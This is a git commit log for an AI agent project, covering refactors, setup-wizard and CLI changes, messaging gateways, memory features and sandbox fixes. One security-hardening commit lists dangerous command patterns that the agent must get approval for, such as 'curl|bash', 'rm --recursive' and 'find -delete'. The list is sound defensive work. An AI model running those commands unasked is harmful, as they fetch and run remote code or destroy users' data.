1. `effective_image` was referenced but never defined — only the Modal
   backend sets this variable. Use `image` directly instead.

2. `--storage-opt size=N` is unsupported on Docker Desktop for Mac
   (requires overlay2 with xfs backing). Skip the flag on Darwin.

3. Docker requires absolute paths for `-w` (working directory) but the
   default cwd was `~`, which Docker does not expand. Default to `/root`
   and translate any `~` passed in from callers.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-02-25 22:31:05 -05:00
George Pickett
e71d9a89d2 Merge origin/main into codex/align-codex-provider-conventions-mainrepo 2026-02-25 19:28:44 -08:00
George Pickett
74c662b63a Harden Codex auth refresh and responses compatibility 2026-02-25 19:27:54 -08:00
George Pickett
91bdb9eb2d Fix Codex stream fallback for Responses completion gaps 2026-02-25 19:08:11 -08:00
George Pickett
47f16505d2 Omit optional function_call id in Responses replay input 2026-02-25 19:00:11 -08:00
George Pickett
e63986b534 Harden Codex stream handling and ack continuation 2026-02-25 18:56:06 -08:00
teknium1
cbde8548f4 Fix for gateway not using nous auth: issue #28 2026-02-25 18:51:28 -08:00
teknium1
7a3656aea2 refactor: integrate Nous Portal support in auxiliary client
- Added functionality to include product attribution tags for Nous Portal in auxiliary API calls.
- Introduced a mechanism to determine if the auxiliary client is backed by Nous Portal, affecting the extra body of requests.
- Updated various tools to utilize the new extra body configuration for enhanced tracking in API calls.
2026-02-25 18:39:36 -08:00
George Pickett
3ba8b15f13 Tone down Codex docs and prompt wording 2026-02-25 18:25:15 -08:00
George Pickett
7727a792f2 Revert README Codex messaging changes 2026-02-25 18:21:50 -08:00
George Pickett
ce175d7372 Fix Codex Responses continuation and schema parity 2026-02-25 18:20:41 -08:00
George Pickett
609b19b630 Add OpenAI Codex provider runtime and responses integration (without .agent/PLANS.md) 2026-02-25 18:20:38 -08:00
teknium1
e3cb957a10 refactor: streamline reasoning configuration checks in AIAgent
- Simplified the logic for determining support for reasoning based on the base URL by introducing clearer variable names.
- Added product attribution for the Nous Portal to the extra body of requests when applicable, enhancing tagging for better tracking.
2026-02-25 16:49:41 -08:00
teknium1
55a0178490 refactor: enhance configuration loading for GatewayRunner
- Implemented dynamic loading of environment variables and configuration from a YAML file to ensure fresh credentials for the GatewayRunner.
- Improved error handling during the loading process to accommodate different encoding scenarios and potential exceptions.
2026-02-25 16:40:52 -08:00
teknium1
9a858b8d67 add identifier for openrouter calls 2026-02-25 16:34:47 -08:00
teknium1
cbff32585d one more windoze fix? 2026-02-25 16:27:40 -08:00
0xbyt4
8fc28c34ce test: reorganize test structure and add missing unit tests
Reorganize flat tests/ directory to mirror source code structure
(tools/, gateway/, hermes_cli/, integration/). Add 11 new test files
covering previously untested modules: registry, patch_parser,
fuzzy_match, todo_tool, approval, file_tools, gateway session/config/
delivery, and hermes_cli config/models. Total: 147 unit tests passing,
9 integration tests gated behind pytest marker.
2026-02-26 03:20:08 +03:00
teknium1
d72b9eadec More fixes for windoze 2026-02-25 15:20:42 -08:00
teknium1
3c5bf5b9d8 refactor: enhance error handling in user prompts
- Updated exception handling in multiple prompt functions to catch NotImplementedError alongside ImportError, improving robustness across the application.
- Ensured fallback mechanisms are clearly documented for better understanding of platform limitations.
2026-02-25 14:10:54 -08:00
VolodymyrBg
5a07e26405 fix: align threading docstring with implementation 2026-02-25 23:56:06 +02:00
teknium1
cd66546e24 refactor: enhance install script output and command handling
- Updated the SSH cloning process to include a cleanup step for partial clones if the SSH attempt fails, improving the fallback to HTTPS.
- Modified output messages for clarity, including renaming the gateway installation command to better reflect its function.
2026-02-25 13:47:04 -08:00
teknium1
21a59a4a7c refactor: improve SSH cloning process in install script
- Added GIT_SSH_COMMAND to disable interactive prompts and set a timeout for SSH cloning, enhancing the cloning process for private repositories.
- Implemented cleanup of partial SSH clones if the SSH attempt fails, ensuring a smoother fallback to HTTPS cloning.
2026-02-25 13:41:16 -08:00
teknium1
b5dbf8e43d Update model version in hermes_cli to use openai/gpt-5.3-codex 2026-02-25 13:26:14 -08:00
teknium1
54e50b8a6e Update README.md to clarify the description of the AI agent, emphasizing its fully open-source nature and enhancing the overall messaging for better understanding. 2026-02-25 12:15:53 -08:00
teknium1
b35dbb0420 Update README.md to refine the description of the AI agent, emphasizing its growth and autonomy while streamlining the language for clarity. 2026-02-25 11:58:16 -08:00
teknium1
63f6afd75b Update README.md to replace badge links with new styles and add a link to the X platform for Nous Research 2026-02-25 11:56:12 -08:00
teknium1
3e311a0092 Update banner image to new version 2026-02-25 11:53:44 -08:00
teknium1
69d3d3c15a Hide Hermes model until next release with agentic capabilities 2026-02-25 11:00:06 -08:00
teknium1
33bc1a3b58 docs: add sandboxed terminal usage recommendations to README
- Introduced a new section in the README outlining the benefits and configurations for running Hermes with a sandboxed terminal backend.
- Provided examples for SSH, Docker, and Modal cloud sandbox setups to enhance security and isolation during command execution.
2026-02-25 10:38:55 -08:00
teknium1
740dd928f7 Release set of skills 2026-02-25 05:21:17 -08:00
teknium1
757d012ab5 refactor: remove outdated skills and references from MLOps
- Deleted the `huggingface-accelerate` skill documentation, which included details on distributed training and common workflows.
- Removed `custom-plugins.md`, `megatron-integration.md`, `performance.md`, and other related reference documents that were no longer relevant or necessary.
- This cleanup aims to streamline the MLOps skills repository and improve maintainability.
2026-02-25 04:22:48 -08:00
teknium1
f64a87209d refactor: enhance session content handling in AIAgent and update TTS output path
- Introduced a new static method `_clean_session_content` in the `AIAgent` class to convert REASONING_SCRATCHPAD tags to <think> blocks and clean up whitespace in session logs.
- Updated the `_save_session_log` method to utilize the cleaned content for assistant messages, ensuring consistency in session logs.
- Changed the default output directory for TTS audio files from `~/voice-memos` to `~/.hermes/audio_cache`, reflecting a more appropriate storage location.
2026-02-25 04:22:03 -08:00
teknium1
41df8ee4f5 refactor: enhance interrupt handling in AIAgent class
- Updated the `clear_interrupt` method to also reset the global tool interrupt signal, improving the clarity of interrupt management within the agent.
- This change ensures that all interrupt states are properly cleared, enhancing the reliability of the agent's operation.
2026-02-25 03:45:47 -08:00
teknium1
6877d5f3b5 docs: add note on message delivery in cronjob_tools
- Included a note clarifying that the agent's final response is auto-delivered to the target, advising against using send_message in the prompt. This enhances user understanding of the message delivery process.
2026-02-25 03:29:10 -08:00
teknium1
6d74d424d3 refactor: update job execution configuration loading in scheduler
- Implemented dynamic loading of environment variables and configuration settings for job execution, allowing for real-time updates without restarting the gateway.
- Enhanced model and API configuration retrieval from both environment variables and a YAML configuration file, improving flexibility and adaptability of the job execution process.
2026-02-25 02:54:13 -08:00
teknium1
9ec4f7504b Provide example datagen config scripts 2026-02-25 02:27:41 -08:00
teknium1
9166d56f17 style: enhance landing page responsiveness and layout
- Added overflow-x hidden to prevent horizontal scrolling on the landing page.
- Updated mobile styles for various elements including hero, sections, and grids to improve layout and readability on smaller screens.
- Adjusted padding, font sizes, and display properties for better user experience across devices.
2026-02-24 18:11:27 -08:00
teknium1
80b90dd0d9 refactor: update landing page metadata for clarity and engagement
- Revised the title and description in the landing page to better convey the agent's adaptability and user-centric features.
- Enhanced Open Graph description for improved social media sharing and clarity of the agent's capabilities.
2026-02-24 18:08:57 -08:00
teknium1
91907789af refactor: remove temporary debug logging in code execution tool
- Eliminated the temporary debug logging in the `execute_code` function that tracked enabled and sandbox tools, streamlining the code and reducing clutter.
2026-02-24 14:25:53 -08:00
teknium1
6845852e82 refactor: update failure message handling in display module and add debug logging in code execution tool
- Modified the `_wrap` function to append a failure suffix without applying red coloring, simplifying the failure message format.
- Introduced temporary debug logging in the `execute_code` function to track enabled and sandbox tools, aiding in troubleshooting.
2026-02-24 14:25:53 -08:00
teknium1
99af12af3f chore: update landing page hero text for improved messaging
- Changed the hero title from "An AI agent you can actually live with." to "An agent that grows with you." to better reflect the agent's adaptability and user-centric approach.
- This update aims to enhance the overall appeal and clarity of the landing page content.
2026-02-24 04:13:45 -08:00
teknium1
fd76ff60ac fix: improve stdout/stderr handling in delegate_task function
- Saved and restored stdout/stderr to prevent redirection issues in child threads, ensuring consistent output during task delegation.
- Enhanced reliability of output handling in concurrent execution scenarios.
2026-02-24 04:13:32 -08:00
teknium1
cc6bea8b90 feat: enhance session search tool with parent session resolution and parallel summarization
- Added a new function to resolve child sessions to their parent, improving session grouping and deduplication.
- Refactored session summarization to run in parallel, enhancing performance and responsiveness.
- Updated search syntax documentation to clarify usage of keywords and phrases for better search results.
2026-02-24 04:07:37 -08:00
teknium1
c1d9e9a285 refactor: improve stdout handling in KawaiiSpinner class
- Captured stdout at spinner creation to prevent redirection issues from child agents.
- Replaced direct print statements with a new `_write` method for consistent output handling during spinner animation and final message display.
- Enhanced code maintainability and clarity by centralizing output logic.
2026-02-24 03:48:11 -08:00
teknium1
681141a526 fix: ansi escapes causing broken terminal cli output 2026-02-24 03:42:12 -08:00
teknium1
c100541f07 refactor: remove direct stdout handling in spinner class
- Eliminated the `_raw_write` function to simplify output handling in the `KawaiiSpinner` class.
- Updated spinner animation and final message display to use standard print statements, ensuring compatibility with prompt_toolkit.
- Improved code clarity and maintainability by reducing complexity in the output rendering process.
2026-02-24 03:40:52 -08:00
teknium1
d64f62c2ef feat: enhance spinner output handling in display module
- Added a new function `_raw_write` to write directly to stdout, bypassing prompt_toolkit's interference with ANSI escapes and carriage returns.
- Updated the `KawaiiSpinner` class to utilize `_raw_write` for rendering spinner animations and final messages, ensuring proper display in terminal environments.
- Improved the clarity of output handling during spinner operations, enhancing user experience during tool execution.
2026-02-24 03:30:28 -08:00
teknium1
e049441d93 feat: add reasoning effort configuration for agent
- Introduced a new configuration option for reasoning effort in the CLI, allowing users to specify the level of reasoning the agent should perform before responding.
- Updated the CLI and agent initialization to incorporate the reasoning configuration, enhancing the agent's responsiveness and adaptability.
- Implemented logic to load reasoning effort from environment variables and configuration files, providing flexibility in agent behavior.
- Enhanced the documentation in the example configuration file to clarify the new reasoning effort options available.
2026-02-24 03:30:19 -08:00
teknium1
a30b2f34eb feat: add landing page for Hermes Agent
- Introduced a new landing page with HTML, CSS, and JavaScript files to showcase the Hermes Agent.
- Added a banner image and logo to enhance visual appeal.
- Implemented interactive features such as a copy-to-clipboard function for installation commands and scroll-triggered animations for improved user engagement.
- Designed a responsive layout with sections detailing the agent's features, installation instructions, and community links.
2026-02-24 03:25:22 -08:00
teknium1
2bf96ad244 feat: add ephemeral prefill messages and system prompt loading
- Implemented functionality to load ephemeral prefill messages from a JSON file, enhancing few-shot priming capabilities for the agent.
- Introduced a mechanism to load an ephemeral system prompt from environment variables or configuration files, ensuring dynamic prompt adjustments at API-call time.
- Updated the CLI and agent initialization to utilize the new prefill messages and system prompt, improving the overall interaction experience.
- Enhanced configuration options with new environment variables for prefill messages and system prompts, allowing for greater customization without persistence.
2026-02-23 23:55:42 -08:00
teknium1
a183827128 feat: enhance README and improve environment configuration
- Added a new section in the README for Inference Providers, detailing setup instructions for Nous Portal, OpenRouter, and Custom Endpoints, improving user guidance for LLM connections.
- Updated messaging platform setup instructions to include Slack and WhatsApp, providing clearer steps for configuration.
- Introduced a new environment variable, TERMINAL_SANDBOX_DIR, to allow users to customize the sandbox storage location for Docker and Singularity environments.
- Refactored the Docker and Singularity environment classes to utilize the new sandbox directory for persistent workspaces, enhancing organization and usability.
- Improved handling of working directories across various environments, ensuring compatibility and clarity in execution paths.
2026-02-23 21:15:35 -08:00
teknium1
54dd1b3038 feat: enhance README and update API client initialization
- Updated the README to include new badges, a detailed description of the Hermes Agent, and a table summarizing its features, improving clarity and presentation for users.
- Modified the API client initialization in `transcription_tools.py` and `tts_tool.py` to include a base URL, ensuring compatibility with the OpenAI API.
2026-02-23 20:59:39 -08:00
Teknium
75d251b81a feat: add API key requirement checks for toolsets
- Introduced a new mapping for toolset environment variable requirements, enhancing the configuration process by prompting users for missing API keys.
- Implemented a function to check and prompt users for necessary API keys when enabling toolsets, improving user experience and ensuring proper setup.
- Updated the tools command to integrate the new API key checks, streamlining the configuration workflow for users.
2026-02-24 00:01:39 +00:00
Teknium
7a6d4666a2 refactor: clarify user prompts in checklist interfaces
- Updated messaging in the checklist prompts to simplify instructions for item selection, changing "Press SPACE to select items, then ENTER on Continue" to "SPACE to toggle, ENTER to confirm."
- Removed the "Continue →" entry from the menu items to streamline the selection process.
- Enhanced user experience by clarifying input prompts and removing unnecessary options, ensuring a more intuitive interaction.
2026-02-23 23:57:31 +00:00
Teknium
d802db4de0 refactor: improve tool configuration prompts for clarity
- Updated the display format of tool descriptions in the configuration prompts to enhance readability.
- Simplified the messaging for enabled tool counts, removing unnecessary color formatting for a cleaner output.
- Streamlined the exit message for the configuration process, improving user experience during tool setup.
2026-02-23 23:54:38 +00:00
Teknium
b103bb4c8b feat: add interactive tool configuration command
- Introduced a new `tools` command in the CLI for configuring enabled tools per platform.
- Implemented an interactive checklist for users to enable or disable toolsets for various platforms, enhancing customization options.
- Created a new `tools_config.py` file to handle the logic for toolset management and user prompts, improving code organization and user experience.
2026-02-23 23:52:07 +00:00
Teknium
a9d16c40c7 refactor: streamline API key prompt in setup wizard
- Introduced a new helper function to handle API key prompts, improving code organization and readability.
- Enhanced user experience by providing a formatted display for API key input, including tool descriptions and URLs.
- Simplified the setup wizard by replacing inline API key handling with the new helper function, ensuring consistent messaging and feedback during configuration.
2026-02-23 23:38:33 +00:00
Teknium
98e3a26b2a refactor: update user prompt in setup wizard for item selection
- Modified the prompt in the setup wizard to clarify the selection process, instructing users to press SPACE to select items and ENTER to continue, enhancing user experience during configuration.
2026-02-23 23:36:59 +00:00
Teknium
f209a92b7e refactor: enhance setup wizard for messaging platform configuration
- Updated the setup wizard to present messaging platforms as a checklist, allowing users to select which platforms to configure.
- Preserved the order of platforms while grouping them for improved clarity.
- Enhanced user prompts for setting up each selected messaging platform, streamlining the configuration process.
2026-02-23 23:32:32 +00:00
Teknium
0edfc7fa49 refactor: update tool progress environment variable defaults and improve setup wizard prompts
- Changed default value for HERMES_TOOL_PROGRESS from "false" to "true" to enable tool progress notifications by default.
- Updated default value for HERMES_TOOL_PROGRESS_MODE from "new" to "all" to provide more comprehensive progress updates.
- Enhanced the setup wizard prompts for enabling tool progress messages and context compression, improving user guidance and experience.
2026-02-23 23:31:07 +00:00
Teknium
cefe038a87 refactor: enhance environment variable configuration and setup wizard
- Updated the OPTIONAL_ENV_VARS dictionary to include a new "category" field for better organization of environment variables.
- Improved the setup wizard to categorize missing optional environment variables into tools and messaging platforms, enhancing user experience during configuration.
- Streamlined the prompts for configuring tools and messaging platforms, allowing for a more intuitive setup process.
2026-02-23 23:25:38 +00:00
Teknium
0858ee2f27 refactor: rename HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY
- Updated the environment variable name from HERMES_OPENAI_API_KEY to VOICE_TOOLS_OPENAI_KEY across multiple files to avoid interference with OpenRouter.
- Adjusted related error messages and configuration prompts to reflect the new variable name, ensuring consistency throughout the codebase.
2026-02-23 23:21:33 +00:00
Teknium
4d1f2ea522 refactor: remove unused multi_select_cursor_brackets_style in prompt_checklist function
- Eliminated the multi_select_cursor_brackets_style parameter from the prompt_checklist function, simplifying the code and improving clarity in the multi-select user interface.
2026-02-23 23:18:57 +00:00
Teknium
6447a6020c feat: add Node.js installation support to the setup script
- Introduced automatic installation of Node.js version 22 if not found on the system, enhancing the setup process for browser tools.
- Improved the check for existing Node.js installations, including support for Hermes-managed installations.
- Added logic to download and extract the appropriate Node.js binary based on the system architecture and OS.
- Updated the installation script to handle missing dependencies like ripgrep and ffmpeg, providing installation prompts for macOS users.
2026-02-23 23:18:13 +00:00
Teknium
b3bf21db56 refactor: update environment variable configuration and add multi-select checklist for tool setup
- Cleared the REQUIRED_ENV_VARS dictionary as no single environment variable is universally required.
- Enhanced the OPTIONAL_ENV_VARS with improved descriptions and added advanced options for better user guidance.
- Introduced a new prompt_checklist function to allow users to select tools during setup, improving the configuration experience.
- Updated the setup wizard to handle missing optional environment variables using the new checklist, streamlining the tool configuration process.
2026-02-23 23:06:47 +00:00
teknium1
674a6f96d3 feat: unify set-home command naming across platforms
- Updated the command name from `/set-home` to `/sethome` in the GatewayRunner class for consistency.
- Added a new slash command `/sethome` in the Discord adapter to set the home channel.
- Registered the `/sethome` command in the Telegram adapter to align with the updated naming convention.
2026-02-23 15:01:22 -08:00
teknium1
79f8831738 refactor: improve message source tagging in GatewayRunner
- Renamed variable `source` to `mirror_src` for clarity in the message tagging logic within the GatewayRunner class, enhancing code readability while maintaining functionality.
2026-02-23 14:58:52 -08:00
teknium1
224c900532 refactor: update session loading method in SessionStore
- Replaced the call to `_load()` with `_ensure_loaded()` in the `has_any_sessions` method to improve clarity and ensure that session data is properly initialized before checking for existing sessions.
2026-02-23 14:56:48 -08:00
teknium1
4f9f5f70e3 fix: handle missing toolset IDs in welcome banner
- Updated the toolset ID retrieval logic in the build_welcome_banner function to use a fallback to the toolset name if the ID is not present, ensuring robustness in displaying unavailable toolsets.
2026-02-23 14:55:53 -08:00
Teknium
38db6e9366 fix: correct toolset ID mapping in welcome banner
- Updated the mapping of unavailable toolsets in the welcome banner from using the internal toolset ID to the toolset name for improved clarity and accuracy in display.
2026-02-23 22:32:34 +00:00
teknium1
d18c753b3c refactor: streamline scratchpad handling in AIAgent
- Removed static methods for converting and checking <REASONING_SCRATCHPAD> tags, simplifying the codebase.
- Replaced calls to the removed methods with direct function calls for better clarity and maintainability.
- Updated trajectory saving logic to utilize a dedicated function for improved organization and readability.
2026-02-23 09:55:09 -08:00
teknium1
8fedbf87d9 feat: add cleanup utility for test artifacts in checkpoint resumption tests
- Introduced a new `_cleanup_test_artifacts` function to remove test-generated files and directories after test execution.
- Integrated the cleanup function into the `test_current_implementation` and `test_interruption_and_resume` tests to ensure proper resource management and prevent clutter from leftover files.
2026-02-23 02:16:10 -08:00
teknium1
d8a369e194 refactor: update API key checks in WebToolsTester
- Replaced the Nous API key check with the Auxiliary Model check in the WebToolsTester class.
- Updated the environment configuration to reflect the change in API key validation, ensuring accurate reporting of available keys.
2026-02-23 02:13:33 -08:00
teknium1
90af34bc83 feat: enhance interrupt handling and container resource configuration
- Introduced a shared interrupt signaling mechanism to allow tools to check for user interrupts during long-running operations.
- Updated the AIAgent to handle interrupts more effectively, ensuring in-progress tool calls are canceled and multiple interrupt messages are combined into one prompt.
- Enhanced the CLI configuration to include container resource limits (CPU, memory, disk) and persistence options for Docker, Singularity, and Modal environments.
- Improved documentation to clarify interrupt behaviors and container resource settings, providing users with better guidance on configuration and usage.
2026-02-23 02:11:33 -08:00
teknium1
c7857dc1d4 feat: enhance AIAgent's tool usage nudges and content handling
- Introduced a method to strip <think> blocks from content, improving text visibility.
- Implemented counters to reset nudge intervals when memory and skill tools are used, enhancing user guidance.
- Captured content from turns with tool calls to provide fallback responses, ensuring continuity in conversation.
- Updated nudge logic to remind users about saving memories and creating skills based on interaction patterns.
2026-02-22 21:33:28 -08:00
teknium1
08e4dc2563 feat: implement channel directory and message mirroring for cross-platform communication
- Introduced a new channel directory to cache reachable channels/contacts for messaging platforms, enhancing the send_message tool's ability to resolve human-friendly names to numeric IDs.
- Added functionality to mirror sent messages into the target's session transcript, providing context for cross-platform message delivery.
- Updated the send_message tool to support listing available targets and improved error handling for channel resolution.
- Enhanced the gateway to build and refresh the channel directory during startup and at regular intervals, ensuring up-to-date channel information.
2026-02-22 20:44:15 -08:00
teknium1
92447141d9 feat: integrate config.yaml values into environment for enhanced flexibility
- Added functionality to load values from config.yaml into the environment, allowing os.getenv() to access them.
- Ensured that existing environment variables take precedence over config values.
- Updated DiscordAdapter to resolve usernames in DISCORD_ALLOWED_USERS to numeric IDs, improving user authorization checks.
- Enhanced event handling to provide clearer logging and ensure proper synchronization of slash commands.
2026-02-22 17:35:45 -08:00
teknium1
e0ed44388f fix: improve error messaging for chat ID and home channel configuration
- Enhanced warning in `_deliver_result` to provide clearer instructions for setting the home channel.
- Updated error message in `send_message_tool` to specify how to set a home channel when no chat ID is provided, improving user guidance.
2026-02-22 17:28:52 -08:00
teknium1
16d0aa7b4d feat: enhance job delivery mechanism in scheduler
- Introduced a new `_deliver_result` function to handle job output delivery to specified platforms.
- Added origin resolution logic to determine the correct delivery target based on job configuration.
- Updated `run_job` to return the final response along with the output for improved context.
- Integrated delivery of job results to the origin chat or fallback channels, with error handling for delivery failures.
- Cleaned up environment variables after job execution to prevent leakage between jobs.
2026-02-22 17:14:44 -08:00
teknium1
6037b6a5ab Fix session saving to DB with full conversation history (not just user/assistant messages without tool calls) 2026-02-22 17:10:24 -08:00
teknium1
e1604b2b4a feat: enhance user authorization checks in GatewayRunner
- Updated the authorization logic to include a per-platform allow-all flag for improved flexibility.
- Revised the order of checks to prioritize platform-specific allow-all settings, followed by environment variable allowlists and DM pairing approvals.
- Added global allow-all configuration for broader access control.
- Improved handling of allowlists by stripping whitespace and ensuring valid entries are processed.
2026-02-22 16:32:08 -08:00
teknium1
db23f51bc6 feat: introduce skills management features in AIAgent and CLI
- Added skills configuration options in cli-config.yaml.example, including a nudge interval for skill creation reminders.
- Implemented skills guidance in AIAgent to prompt users to save reusable workflows after complex tasks.
- Enhanced skills indexing in the prompt builder to include descriptions from SKILL.md files for better context.
- Updated the agent's behavior to periodically remind users about potential skills during tool-calling iterations.
2026-02-22 13:28:13 -08:00
teknium1
3c6750f37b feat: enhance memory management features in AIAgent and CLI
- Added configuration options for memory nudge interval and flush minimum turns in cli-config.yaml.example.
- Implemented memory flushing before conversation reset, clearing, and exit in the CLI to ensure memories are saved.
- Introduced a flush_memories method in AIAgent to handle memory persistence before context loss.
- Added periodic nudges to remind the agent to consider saving memories based on user interactions.
2026-02-22 10:15:17 -08:00
teknium1
df2ec585f1 fix: clarify MEMORY_GUIDANCE phrasing
- Updated the MEMORY_GUIDANCE text to improve clarity by rephrasing the usage instructions for the memory tool, emphasizing its diary-like functionality.
2026-02-22 02:41:27 -08:00
teknium1
250b2ca01a fix: update MEMORY_GUIDANCE for clarity
- Revised the MEMORY_GUIDANCE text to enhance clarity by adjusting the phrasing for better user understanding of memory tool usage.
2026-02-22 02:40:16 -08:00
teknium1
c2d5f7bf26 feat: add timestamp formatting function for session metadata
- Introduced a new `_format_timestamp` function to convert Unix timestamps and ISO strings into a human-readable date format.
- Updated the session metadata handling to use the new formatting function for improved clarity in session start dates.
- Adjusted the output structure to reflect the change from "Session started" to "Session date" for better user understanding.
2026-02-22 02:37:26 -08:00
teknium1
e223b4ac09 Enhance agent guidance with memory and session search tools
- Introduced MEMORY_GUIDANCE and SESSION_SEARCH_GUIDANCE to improve agent's contextual awareness and proactive assistance.
- Updated AIAgent to conditionally include tool-aware guidance in prompts based on available tools.
- Enhanced descriptions in memory and session search schemas for clearer user instructions on when to utilize these features.
2026-02-22 02:31:52 -08:00
teknium1
f072801f38 refactor: remove unused compression model variable in AIAgent
- Eliminated the `compression_model` variable from the AIAgent class, as it was not being utilized.
- Cleaned up the context compressor initialization for improved clarity and maintainability.
2026-02-22 02:17:33 -08:00
teknium1
ededaaa874 Hermes Agent UX Improvements 2026-02-22 02:16:11 -08:00
teknium1
b1f55e3ee5 refactor: reorganize agent and CLI structure for improved clarity
- Extracted agent internals into a dedicated `agent/` directory, including model metadata, context compression, and prompt handling.
- Enhanced CLI structure by separating banner, commands, and callbacks into distinct modules within `hermes_cli/`.
- Updated README to reflect the new directory organization and clarify the purpose of each component.
- Improved tool registration and terminal execution backends for better maintainability and usability.
2026-02-21 23:17:18 -08:00
teknium1
51b95236f9 refactor: move model metadata functions to agent/model_metadata.py
- Relocated functions related to model metadata, including fetch_model_metadata, get_model_context_length, estimate_tokens_rough, and estimate_messages_tokens_rough, to agent/model_metadata.py for better organization and maintainability.
- Updated imports in run_agent.py to reflect the new location of these functions.
2026-02-21 22:34:18 -08:00
teknium1
9123cfb5dd Refactor Terminal and AIAgent cleanup 2026-02-21 22:31:43 -08:00
teknium1
9018e9dd70 refactor: update tool registration and documentation
- Enhanced tool registration process by implementing a self-registering mechanism in each tool file via `tools/registry.py`.
- Updated `model_tools.py` to serve as a thin orchestration layer, simplifying tool discovery and registration.
- Revised documentation to clarify the steps for adding new tools, emphasizing the importance of schema, handler, and registration consistency.
- Improved dependency resolution in environments by ensuring toolsets are queried from `tools/registry.py`.
2026-02-21 21:03:40 -08:00
teknium1
08ff1c1aa8 More major refactor/tech debt removal! 2026-02-21 20:22:33 -08:00
teknium1
6134939882 refactor: deduplicate toolsets, unify async bridging, fix approval race condition, harden security
- Replace 4 copy-pasted messaging platform toolsets with shared _HERMES_CORE_TOOLS list
- Consolidate 5 ad-hoc async-bridging patterns into single _run_async() in model_tools.py
  - Removes deprecated get_event_loop()/set_event_loop() calls
  - Makes all tool handlers self-protecting regardless of caller's event loop state
  - RL handler refactored from if/elif chain to dispatch dict
- Fix exec approval race condition: replace module-level globals with thread-safe
  per-session tools/approval.py (submit_pending, pop_pending, approve_session, is_approved)
  - Session A approving "rm" no longer approves it for all other sessions
- Fix config deep merge: user overriding tts.elevenlabs.voice_id no longer clobbers
  tts.elevenlabs.model_id; migration detection now recurses to arbitrary depth
- Gateway default-deny: unauthenticated users denied unless GATEWAY_ALLOW_ALL_USERS=true
- Add 10 dangerous command patterns: rm --recursive, bash -c, python -e, curl|bash,
  xargs rm, find -delete
- Sanitize gateway error messages: users see generic message, full traceback goes to logs
2026-02-21 18:28:49 -08:00
teknium1
7cb6427dea refactor: streamline cron job handling and update CLI commands
- Removed legacy cron daemon functionality, integrating cron job execution directly into the gateway process for improved efficiency.
- Updated CLI commands to reflect changes, replacing `hermes cron daemon` with `hermes cron status` and enhancing documentation for cron job management.
- Clarified messaging in the README and other documentation regarding the gateway's role in managing cron jobs.
- Removed obsolete terminal_hecate tool and related configurations to simplify the codebase.
2026-02-21 16:21:19 -08:00
teknium1
79b62497d1 enable cronjobs in messaging platforms 2026-02-21 12:46:18 -08:00
teknium1
0729ef7353 fix: refine environment creation condition in terminal_tool
- Updated the environment creation condition to specifically check for "singularity" instead of allowing "local", ensuring more precise handling of environment types during task execution.
2026-02-21 12:43:56 -08:00
teknium1
8f6788474b feat: enhance logging in AIAgent for quiet mode
- Added functionality to suppress logging noise from specific modules when in quiet mode, improving user experience in CLI.
- Updated terminal_tool.py to change the log level for fallback directory usage from warning to debug, providing clearer context without cluttering logs.
2026-02-21 12:41:05 -08:00
teknium1
5c2926102b fix: improve placeholder handling and hint height in CLI
- Updated the placeholder text logic to append new fragments after existing ones, preserving the prompt appearance.
- Adjusted the hint height to maintain a 1-line spacer while the agent is running, preventing output from crowding the input area.
2026-02-21 12:36:14 -08:00
teknium1
bff37075f6 feat: enhance CLI input handling with password masking and placeholder text
- Added input processors for password masking during sudo prompts and inline placeholder text for various states in the CLI.
- Implemented a custom placeholder processor to display context-sensitive instructions based on the current state (e.g., sudo, approval, clarify).
- Updated hint text logic to improve user guidance during interactive prompts, enhancing overall user experience.
2026-02-21 12:33:48 -08:00
teknium1
c98ee98525 feat: implement interactive prompts for sudo password and command approval in CLI
- Added methods for handling sudo password and dangerous command approval prompts using a callback mechanism in cli.py.
- Integrated these prompts with the prompt_toolkit UI for improved user experience.
- Updated terminal_tool.py to support callback registration for interactive prompts, enhancing the CLI's interactivity.
- Introduced a background thread for API calls in run_agent.py to allow for interrupt handling during long-running operations.
- Enhanced error handling for interrupted API calls, ensuring graceful degradation of user experience.
2026-02-21 12:15:40 -08:00
teknium1
ecb430effe refactor: enhance API interaction and message handling in AIAgent
- Introduced new methods in run_agent.py for building API keyword arguments and normalizing assistant messages from API responses.
- Added functionality for compressing conversation context and managing session state in SQLite.
- Improved tool call execution handling, including enhanced logging and error management.
- Updated path handling in multiple platform files to utilize pathlib for better compatibility and readability.
2026-02-21 04:17:27 -08:00
teknium1
7ee7221af1 refactor: consolidate debug logging across tools with shared DebugSession class
- Introduced a new DebugSession class in tools/debug_helpers.py to centralize debug logging functionality, replacing duplicated code across various tool modules.
- Updated image_generation_tool.py, mixture_of_agents_tool.py, vision_tools.py, web_tools.py, and others to utilize the new DebugSession for logging tool calls and saving debug logs.
- Enhanced maintainability and consistency in debug logging practices across the codebase.
2026-02-21 03:53:24 -08:00
teknium1
748fd3db88 refactor: enhance error handling with structured logging across multiple modules
- Updated various modules including cli.py, run_agent.py, gateway, and tools to replace silent exception handling with structured logging.
- Improved error messages to provide more context, aiding in debugging and monitoring.
- Ensured consistent logging practices throughout the codebase, enhancing traceability and maintainability.
2026-02-21 03:32:11 -08:00
teknium1
cbff1b818c refactor: remove obsolete Nous API test scripts
- Deleted test scripts for Nous API limits, patterns, and temperature checks to streamline the testing suite.
- These scripts were no longer necessary and their removal helps maintain a cleaner codebase.
2026-02-21 03:21:13 -08:00
teknium1
a885d2f240 refactor: implement structured logging across multiple modules
- Introduced logging functionality in cli.py, run_agent.py, scheduler.py, and various tool modules to replace print statements with structured logging.
- Enhanced error handling and informational messages to improve debugging and monitoring capabilities.
- Ensured consistent logging practices across the codebase, facilitating better traceability and maintenance.
2026-02-21 03:11:11 -08:00
teknium1
b6247b71b5 refactor: update tool descriptions for clarity and conciseness
- Revised descriptions for various tools in model_tools.py, browser_tool.py, code_execution_tool.py, delegate_tool.py, and terminal_tool.py to enhance clarity and reduce verbosity.
- Improved consistency in terminology and formatting across tool descriptions, ensuring users have a clearer understanding of tool functionalities and usage.
2026-02-21 02:41:30 -08:00
teknium1
3555c6173d refactor: remove temporary API payload logging and enhance session log structure
- Eliminated the `_log_api_payload` method used for temporary debugging, streamlining the codebase.
- Updated the `_save_session_log` method to save the full raw session, including all messages and metadata, improving the clarity and completeness of session logs.
- Adjusted session log entry to include additional context such as `base_url` and `platform` for better tracking.
2026-02-21 01:26:37 -08:00
teknium1
3976962621 fix: update session logging directory path in README and code
- Changed the session logging directory from `~/.hermes-agent/logs/` to `~/.hermes/sessions/` for consistency.
